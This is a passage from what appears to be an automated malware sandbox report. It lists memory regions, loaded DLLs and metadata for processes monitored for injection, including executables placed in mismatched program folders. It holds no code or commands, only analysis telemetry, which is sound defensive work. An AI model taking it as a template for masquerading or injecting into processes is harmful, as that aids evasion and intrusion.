monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3571 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3572 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3573 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3574 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3575 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3576 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3577 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3578 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3580 start_va = 0x940000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Thread: id = 182 os_tid = 0x580 Process: id = "29" image_name = "pidgin.exe" filename = "c:\\program files\\dvd maker\\pidgin.exe" page_root = "0x4d014000" os_pid = "0x894" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\DVD Maker\\pidgin.exe\" " cur_dir = "C:\\Program Files\\DVD Maker\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3581 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3582 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3583 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3584 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3585 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3586 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3587 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3588 start_va = 0x110000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3589 start_va = 0x120000 end_va = 0x1fefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 3590 start_va = 0x200000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3591 start_va = 0x310000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 3592 start_va = 0x540000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3593 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3594 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 3595 start_va = 0x980000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 3596 start_va = 0xc70000 end_va = 0xcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 3597 start_va = 0x1070000 end_va = 0x1086fff monitored = 0 entry_point = 0x10714a1 region_type = mapped_file name = "pidgin.exe" filename = "\\Program Files\\DVD Maker\\pidgin.exe" (normalized: "c:\\program files\\dvd maker\\pidgin.exe") Region: id = 3598 start_va = 0x1090000 end_va = 0x248ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001090000" filename = "" Region: id = 3599 start_va = 0x2490000 end_va = 0x2e53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002490000" filename = "" Region: id = 3600 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3601 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3602 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3603 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3604 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3605 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3606 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3607 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3608 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3609 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3610 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3611 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3612 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3613 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3614 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3615 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3616 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3617 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3618 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3619 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3620 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3621 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3622 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3623 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3624 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3625 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3626 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3627 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3628 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3629 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3630 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3631 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3633 start_va = 0xcb0000 end_va = 0xe4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Thread: id = 183 os_tid = 0x898 Process: id = "30" image_name = "scriptftp.exe" filename = "c:\\program files (x86)\\msbuild\\scriptftp.exe" page_root = "0x4d61a000" os_pid = "0x89c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\MSBuild\\scriptftp.exe\" " cur_dir = "C:\\Program Files (x86)\\MSBuild\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3634 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3635 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3636 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3637 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3638 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3639 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3640 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3641 start_va = 0x160000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3642 start_va = 0x230000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 3643 start_va = 0x270000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 3644 start_va = 0x370000 end_va = 0x4f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 3645 start_va = 0x550000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3646 start_va = 0x5d0000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 3647 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 3648 start_va = 0x960000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 3649 start_va = 0x9a0000 end_va = 0xa7efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 3650 start_va = 0x10e0000 end_va = 0x10f6fff monitored = 0 entry_point = 0x10e14a1 region_type = mapped_file name = "scriptftp.exe" filename = "\\Program Files (x86)\\MSBuild\\scriptftp.exe" (normalized: "c:\\program files (x86)\\msbuild\\scriptftp.exe") Region: id = 3651 start_va = 0x1100000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 3652 start_va = 0x2500000 end_va = 0x2ec3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002500000" filename = "" Region: id = 3653 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3654 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3655 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3656 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3657 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3658 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3659 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3660 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3661 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3662 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3663 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3664 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3665 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3666 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3667 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3668 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3669 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3670 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3671 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3672 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3673 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3674 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3675 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3676 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3677 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3678 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3679 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3680 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3681 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3682 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3683 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3684 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3686 start_va = 0xa80000 end_va = 0xbc3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Thread: id = 184 os_tid = 0x8a0 Process: id = "31" image_name = "skype.exe" filename = "c:\\program files\\windows media player\\skype.exe" page_root = "0x4c520000" os_pid = "0x8a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\Windows Media Player\\skype.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3687 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3688 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3689 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3690 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3691 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3692 start_va = 0x60000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3693 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 3694 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3695 start_va = 0x1e0000 end_va = 0x246fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3696 start_va = 0x280000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 3697 start_va = 0x330000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3698 start_va = 0x3b0000 end_va = 0x48efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 3699 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3700 start_va = 0x500000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3701 start_va = 0x600000 end_va = 0x787fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 3702 start_va = 0x790000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 3703 start_va = 0x1120000 end_va = 0x1136fff monitored = 0 entry_point = 0x11214a1 region_type = mapped_file name = "skype.exe" filename = "\\Program Files\\Windows Media Player\\skype.exe" (normalized: "c:\\program files\\windows media player\\skype.exe") Region: id = 3704 start_va = 0x1140000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 3705 start_va = 0x2540000 end_va = 0x2f03fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002540000" filename = "" Region: id = 3706 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3707 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3708 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3709 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = 